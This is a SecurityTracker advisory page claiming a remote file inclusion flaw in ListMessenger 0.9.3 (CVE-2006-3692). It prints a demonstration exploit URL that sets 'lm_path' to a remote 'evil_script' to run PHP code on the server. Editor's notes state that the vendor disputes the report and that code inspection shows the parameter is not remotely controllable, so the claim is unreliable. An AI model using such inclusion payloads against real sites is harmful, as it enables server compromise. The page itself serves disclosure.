SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   ListMessenger Vendors:   Silentweb
[Vendor Disputes the Report] ListMessenger 'lm_path' Include File Bug Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016530
SecurityTracker URL:  http://securitytracker.com/id/1016530
CVE Reference:   CVE-2006-3692   (Links to External Site)
Updated:  Jul 26 2006
Original Entry Date:  Jul 18 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.9.3
Description:   A vulnerability was reported in ListMessenger. A remote user can include and execute arbitrary code on the target system. [Editor's note: The vendor disputes this report.]

The software does not properly validate user-supplied input. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[path]/enduser/listmessenger.php?lm_path=evil_script?

XORON discovered this vulnerability.

[Editor's note: Code inspection of the 'listmessenger.php' source code for version 0.9.3 shows that 'lm_path' is defined as a local file and, therefore, cannot be modified by a remote user. This alert will be deleted shortly.]

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

[Editor's note: The vendor disputes this report.]

Solution:   No solution was available at the time of this entry.

[Editor's note: The vendor disputes this report.]

Vendor URL:  www.listmessenger.com/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  ListMessenger v0.9.3 Remote File Inclusion Vulnerability

ListMessenger v0.9.3 Remote File Inclusion Vulnerability


-


Discoverd By : xoron


-


Conatact : x0r0n[at]hotmail.com


-


script: ListMessenger 0.9.3 


-


URL: http://www.listmessenger.com


-


Exp: www.target.com/[path]/enduser/listmessenger.php?lm_path=evil_script?


-


Code:  require_once($lm_path."config.inc.php")


-


XORON - Cyber-Warrior.org

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC